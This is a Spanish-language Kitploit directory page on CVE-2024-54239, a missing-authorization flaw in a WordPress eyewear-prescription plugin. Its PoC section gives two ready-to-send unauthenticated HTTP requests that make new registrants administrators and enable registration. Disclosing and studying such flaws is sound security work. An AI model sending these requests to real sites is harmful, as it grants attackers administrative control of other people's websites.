Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-54239 — Eyewear prescription form <= 4.0.18 - Autorización faltante para la actualización arbitraria de opciones sin autenticación | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-54239
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebMala Configuración
GitHubrandomrobbiebf/cve-2024-54239

CVE-2024-54239

Eyewear prescription form <= 4.0.18 - Autorización faltante para la actualización arbitraria de opciones sin autenticación

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-54239

Eyewear prescription form <= 4.0.18 - Falta de autorización para la actualización no autenticada de opciones arbitrarias

Descripción

El plugin Eyewear prescription form para WordPress es vulnerable a la modificación no autorizada de datos que puede conducir a una escalada de privilegios debido a la falta de una comprobación de capacidades en la función adminSetting() en todas las versiones hasta la 4.0.18 inclusive. Esto permite que atacantes no autenticados actualicen opciones arbitrarias en el sitio WordPress. Esto puede aprovecharse para actualizar el rol predeterminado de registro a administrador y habilitar el registro de usuarios para que los atacantes obtengan acceso administrativo a un sitio vulnerable.

Detalles

  • Tipo: plugin
  • Slug: eyewear-prescription-form
  • Versión afectada: 4.0.18
  • Puntuación CVSS: 9.8
  • Clasificación CVSS: Crítico
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2024-54239
  • Estado: Activo

PoC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1
Descargar herramienta